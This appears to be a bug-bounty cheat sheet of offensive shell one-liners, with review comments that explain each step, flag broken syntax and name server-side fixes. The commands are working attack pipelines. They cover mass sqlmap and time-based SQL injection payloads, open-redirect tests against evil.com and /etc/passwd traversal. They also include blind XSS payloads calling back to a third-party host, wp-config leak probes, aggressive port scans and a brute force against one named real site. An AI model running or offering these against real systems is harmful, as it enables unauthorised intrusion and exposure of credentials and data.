This repository contains a list of one-liners with descriptions and installation requirements
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- GAU : https://github.com/lc/gau
- GF : https://github.com/tomnomnom/gf
- Findomain : https://github.com/Findomain/Findomain
- HTTPX : https://github.com/projectdiscovery/httpx
- Anew : https://github.com/tomnomnom/anew
- Waybackurls : https://github.com/tomnomnom/waybackurls
# SQL injection discovery. The application-side fix is the same for every check in this
# section: parameterized queries, and no database error text returned to the client.
#
# Subdomain enumeration -> archived URLs -> gf "sqli" pattern filter -> sqlmap over the list;
# sqlmap output is appended to sqli_report.txt.
# --batch answers every sqlmap prompt with its default, and --risk 3 is sqlmap's highest
# risk setting (it adds OR-based tests, which can modify rows when the injection point
# sits in an UPDATE/DELETE statement).
# --random-agent only changes the User-Agent header; request volume and payload shapes
# still show up in web server and WAF logs.
# NOTE(review): "-d http://TARGET.com" passes a URL where a bare domain is presumably
# expected, and "- blacklist" (dash, space) does not look like a valid gau option —
# confirm both against the tools' usage text.
subfinder -d http://TARGET.com -silent -all | gau - blacklist ttf,woff,svg,png | sort -u | gf sqli >gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt
# Same flow using findomain plus an httpx liveness probe, with sqlmap at --level 1.
# ">> sqli" appends, so URLs from earlier runs stay in the file and are tested again.
# NOTE(review): anew is called without a file argument; presumably it then only
# de-duplicates stdin — confirm.
findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
# Error-based check: keep lines from urls.txt that match ".php", cut everything after
# ".php" and add "/", de-duplicate, append %27%22%60 (URL-encoded ' " `), fetch each
# URL and look for one specific SQL syntax error string in the body.
# The red "Not Vulnerable" line only means that one string was absent; applications
# that hide errors (or use another database) print red regardless of their real state.
# NOTE(review): grep ".php" treats "." as "any character"; "read url do" puts the first
# whitespace-delimited field in $url and the remainder in a variable named "do";
# read lacks -r; and with "A && B || C" the red branch also runs if the green echo fails.
cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by Cybertix\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done
# Time-based check through the X-Forwarded-For header: the header value asks the
# database to sleep 13 seconds and -mrt '>13' keeps hosts whose response took longer.
# A slow or overloaded host produces the same signal, so a match needs a second look.
# Relevant where an application writes the client IP taken from X-Forwarded-For into a
# query; that header is client-controlled and has to be treated like any other input.
cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'
────────────────────────────────────────────────────────────────────────
- Waybackurls : https://github.com/tomnomnom/waybackurls
- Bhedak : https://github.com/R0X4R/bhedak
- GAU : https://github.com/lc/gau
- GF : https://github.com/tomnomnom/gf
- QS-Replace : https://github.com/tomnomnom/qsreplace
- HTTPX : https://github.com/projectdiscovery/httpx
- Subfinder : https://github.com/projectdiscovery/subfinder
- Httprobe : https://github.com/tomnomnom/httprobe
- Nuclei : https://github.com/projectdiscovery/nuclei
# Open-redirect discovery. Application-side fix: redirect only to relative paths or to
# an allow-list of destinations, never to a URL taken verbatim from a parameter.
#
# Takes archived URLs that contain "=http" (a parameter whose value is a URL), replaces
# every query value with http://evil.com, requests headers only (-I) while following
# redirects (-L), and prints the URL when "evil.com" appears in the response headers.
# The grep matches anywhere in the headers, so a same-site redirect that merely carries
# the value along (for example inside a "next=" parameter of the Location) also matches.
# NOTE(review): $host is unquoted although it comes from archived, untrusted URLs; the
# "?" in every query string is a glob character, so the argument should be "$host".
# read lacks -r, and echo without -e prints the \033 and \n sequences literally in bash.
waybackurls TARGET.COM | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I| grep "evil.com" && echo "$host \033[0;31mVulnerable\n" ;done
# Subdomains from domains.txt -> live hosts (live_domain.txt) -> archived URLs
# (wayback.txt) -> de-duplicated URLs containing "?" (open.txt) -> nuclei run with the
# local template Url-Redirection-Catcher.yaml, which is not shown on this page.
# Each stage overwrites its output file, so earlier results are lost on re-run.
subfinder -dL domains.txt | httprobe |tee live_domain.txt; cat live_domain.txt | waybackurls | tee wayback.txt; cat wayback.txt | sort -u | grep "\?" > open.txt; nuclei -t Url-Redirection-Catcher.yaml -l open.txt
────────────────────────────────────────────────────────────────────────
# Path traversal check: requests a "../" chain ending in /etc/passwd from every URL in
# url.txt and keeps responses with status 200 (-mc) whose body contains "root:" (-ms).
# Requiring both conditions filters out soft-404 pages that answer 200 to anything.
# Server side this is prevented by canonicalizing the path before the access check and
# serving only from a fixed document root; in logs it appears as request paths with
# repeated slashes and "../" sequences.
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- Assetfinder : https://github.com/tomnomnom/assetfinder
- Amass : https://github.com/OWASP/Amass
- Subjack : https://github.com/haccer/subjack
# Subdomain takeover check: three enumerators append their results to FILE, then
# subjack compares each name against the signatures in fingerprints.json and appends
# its findings to the file "takeover".
# What it finds are DNS records (typically CNAMEs) that still point at a hosted service
# the owner no longer controls; the fix is to delete the DNS record when the service
# is decommissioned.
# NOTE(review): FILE and "takeover" are only ever appended to and never de-duplicated,
# so repeated runs re-test old names. $GOPATH is unquoted. The fingerprints path sits
# under github.com/cybertix/subjack while the tool list links haccer/subjack — confirm
# the file actually exists at that path.
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/cybertix/subjack/fingerprints.json -v 3 >> takeover ;
────────────────────────────────────────────────────────────────────────
# Fetches one page and prints every substring that looks like a URL (-o prints only
# the match, -P selects Perl-compatible regex syntax).
# NOTE(review): "[^]*" looks like a character class that lost a character in
# transcription (possibly "[^ ]*" or a quote character); as written the "]" is read as
# a member of the class and the class is never closed — confirm the intended pattern.
# "https*.//" also accepts any single character where ":" is meant.
curl "https://TARGET.Com" | grep -oP '(https*.//|www\.)[^]*'
────────────────────────────────────────────────────────────────────────
- Katana : https://github.com/projectdiscovery/katana
- Dalfox : https://github.com/hahwul/dalfox
- Waybackurls : https://github.com/tomnomnom/waybackurls
- GF : https://github.com/tomnomnom/gf
- Dalfox : https://github.com/hahwul/dalfox
- HTTPX : https://github.com/projectdiscovery/httpx
# Cross-site scripting discovery. Application-side fix: context-aware output encoding
# of every reflected or stored value, backed by a Content-Security-Policy.
#
# Crawls the site with katana (depth 5, concurrency 50, also reading robots.txt and
# sitemap.xml) and pipes the discovered URLs with query strings into dalfox.
echo http://testphp.vulnweb.com | katana -jc -f qurl -d 5 -c 50 -kf robotstxt,sitemapxml -silent | dalfox pipe --skip-bav
# Archived URLs -> gf "xss" pattern filter -> parameter values stripped -> dalfox.
# -b sets the callback address used for blind XSS payloads. The host shown belongs to
# a third party, so any callback (and the page data sent with it) would go to that
# domain's owner rather than to the person running the command.
# "tee XSS.txt && cat XSS.txt" reads back the file that was just written; output.txt is
# overwritten on every run.
waybackurls http://testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee XSS.txt && cat XSS.txt | dalfox -b http://chirag.bxss.in pipe > output.txt
# Sends a script tag in the User-Agent header of every request. Nothing is reflected to
# the sender; the check is for log viewers, analytics dashboards or admin panels that
# later render the stored User-Agent without encoding it.
# The script source is the same third-party host as in the previous command.
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://chirag.bxss.in></script>"
────────────────────────────────────────────────────────────────────────
# Crawls the site including JavaScript files (depth 5) and appends endpoints not yet
# present to endpoint.txt via anew.
# NOTE(review): "-filed" looks like a typo for katana's field option — confirm; "-hl"
# presumably selects headless mode, which needs a local browser.
katana -u http://testphp.vulnweb.com -js-crawl -d 5 -hl -filed endpoint | anew endpoint.txt
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
# Requests an application-config API path on every enumerated subdomain and keeps the
# hosts that answer 200.
# NOTE(review): the path resembles the Joomla web-services API — confirm. A 200 alone
# does not show that configuration data was returned; the body has to be checked.
# If an instance does answer with its configuration, the credentials in it have to be
# treated as exposed and rotated in addition to patching and restricting the API.
# "-d http://TARGET.COM" passes a URL where a bare domain is presumably expected.
subfinder -d http://TARGET.COM -silent -all | httpx -silent -path 'api/index.php/v1/config/application?public=true' -mc 200
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
# Requests a /cpanelwebcall/ path containing an HTML tag on ports 80, 443, 2082 and
# 2083 of every enumerated subdomain and keeps the hosts that answer 400.
# The 400 status only shows that the path reached an error handler; whether the markup
# is echoed unencoded in that error page has to be read from the response body.
# Exposure is reduced by keeping the control panel updated and by not publishing its
# management ports to the internet.
# "-d http://example.com" passes a URL where a bare domain is presumably expected.
subfinder -d http://example.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path '/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaaaaa' -mc 400
────────────────────────────────────────────────────────────────────────
- Subfinder : https://github.com/projectdiscovery/subfinder
- HTTPX : https://github.com/projectdiscovery/httpx
# Requests /wp-config.PHP (upper-case extension) on nine common web ports and keeps
# the hosts that answer 200.
# Presumably aimed at servers whose PHP handler or deny rule matches ".php"
# case-sensitively, so the file is served as text instead of executed — confirm.
# A 200 may still be a soft-404 page; the body decides.
# Server side: match deny rules case-insensitively, keep the file outside the web root
# where the platform allows it, and rotate the database credentials and salts if the
# file was ever readable.
subfinder -silent -d TARGET.com | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8088 -path "/wp-config.PHP" -mc 200 -t 60 -status-code
────────────────────────────────────────────────────────────────────────
- Gau : https://github.com/lc/gau
- HTTPX : https://github.com/projectdiscovery/httpx
- Nuclei : https://github.com/projectdiscovery/nuclei
# Archived URLs containing "js" -> live responses served as application/javascript ->
# nuclei with the "exposures" template directory; results are written to secrets.txt.
# Looks for API keys and tokens shipped in client-side JavaScript. Anything it finds
# has been public for as long as the file was served, so the remedy is rotation of the
# credential, not just removal from the script.
# secrets.txt can itself contain live credentials and should be stored accordingly.
# NOTE(review): grep ".js" treats "." as "any character" and matches anywhere in the
# URL; the template path is hard-coded under /root.
echo TARGET.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt
────────────────────────────────────────────────────────────────────────
- Shodan : https://www.shodan.io
# Queries the Shodan index for hosts of one organisation that serve a favicon with the
# given hash and prints address and port. The lookup runs against Shodan's data, so it
# sends no traffic to the hosts themselves; the page does not say which product the
# hash identifies.
# NOTE(review): "org: "Target"" has a space after the colon, "port--separator" is two
# tokens fused together and --separator is given no value, and awk prints $1 and $2
# with nothing between them — confirm the intended command.
shodan search org: "Target" http.favicon.hash:116323821 --fields ip_str,port--separator | awk '{print $1 $2}'
────────────────────────────────────────────────────────────────────────
- Waybackurls : https://github.com/tomnomnom/waybackurls
- HTTPX : https://github.com/projectdiscovery/httpx
# Archived URLs for every subdomain -> those that still answer 200 -> those served as
# application/json. The result is a list of API endpoints reachable without a session;
# each one should be checked for whether it was meant to require authentication.
cat subdomains.txt | waybackurls | httpx -mc 200 -ct | grep application/json
────────────────────────────────────────────────────────────────────────
- FFUF : https://github.com/ffuf/ffuf
# Content discovery with the Host header set to 127.0.0.1; -fs hides responses of the
# usual size so only paths that answer differently remain.
# Finds paths where access control trusts the Host header. Server side, the Host value
# should be validated against an allow-list at the reverse proxy and never used to
# decide whether a request is "local".
# NOTE(review): the quotes around the header are typographic (“ ”), which the shell
# passes through literally and splits on the space; "target[.]com" is defanged and
# "<regular_content_length>" is a placeholder that the shell would read as redirection.
ffuf -u https://target[.]com/FUZZ -H “Host: 127.0.0.1” -w /home/user/path/to/wordlist.txt -fs <regular_content_length>
────────────────────────────────────────────────────────────────────────
# Path traversal check against port 8443 for every host in file.txt; prints the
# matching passwd line and "<host> is VULN" when the body contains "root:".
# The URL uses http:// on 8443, so -k (skip certificate verification) has no effect
# unless the request is redirected to HTTPS.
# NOTE(review): "read host do" also assigns to a variable named "do", read lacks -r,
# and $host is unquoted in the echo.
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done
# Port scan of a fixed list of ports over the addresses in ip_resolver.txt; results are
# shown and written to bbcport.txt.
sudo naabu -list ip_resolver.txt -p 7,20,21,22,23,25,53,69,80,88,102,110,135,137,139,143,381,383,443,464,465,587,593,636,691,902,989,990,993,995,1025,1194,1337,1589,1725,2082,2083,2483,2484,2967,3074,3306,3724,4664,5432,5900,6665,6666,6667,6668,6669,6881,6999,6970,8086,8087,8222,9100,10000,12345,27374,31337 | tee bbcport.txt
# Full TCP port range at up to 100000 packets per second, greppable output in raj.txt.
# At that rate the scan can saturate the scanner's own uplink and drop results, and it
# is trivially visible to any IDS or flow monitor on the path.
masscan -p1-65535 -iL ip_resolver.txt --max-rate 100000 -oG raj.txt
# All ports with service and OS detection. -A already enables -sV and -O (plus default
# scripts and traceroute), so those two flags are redundant. No output file is set.
nmap -iL ip_resolver.txt -sV -O -p- -A
# Probes each address for a web server and runs the whole local nuclei template tree
# against the ones that answer; the template path is hard-coded.
cat ip_resolver.txt | httpx | nuclei -t /home/kali/Desktop/nuclei-templates/
# Lists live web servers with status code and page title.
# NOTE(review): grep "200" matches anywhere in the line (address, port, title), not
# only the status column; httpx's own status filter (-mc, used elsewhere on this page)
# avoids that.
cat ip_resolver.txt | httpx --status-code -title | grep "200"
# Directory and file brute force with a long extension list, hiding 403 and 401.
# NOTE(review): the list has spaces after the commas, so the shell splits it into
# separate arguments and only "php," reaches -e; "aspx.jsp.py" looks like three
# extensions joined by dots. The -u value is a specific hostname rather than a
# placeholder like the other entries on this page.
python3 dirsearch.py -e php, asp, aspx.jsp.py, txt, conf, config, bak, backup, swp, old, db, sqlasp, aspx,aspx-,asp-, py,py-, rb, rb, php, php-, bak, bkp, cache, cgi, conf, csv, html, inc, jar, js, json, jsp, jsp-, lock, log, rar, old, sql, sql.gz, sql.zip, sql.tar.gz,sql-, swp, swp-, tar, tar.bz2, tar.gz, txt,wadl, zip -u www.jetking.com --exclude-status 403,401
# Live hosts -> katana crawl (depth 5) -> URLs saved to list.txt and piped into a local
# script (xss_vibes/main.py, not shown on this page) with "--pipe -t 7".
cat alldomains.txt | httpx | katana -d 5 | tee list.txt | python3 /home/kali/Desktop/tools/xss_vibes/main.py --pipe -t 7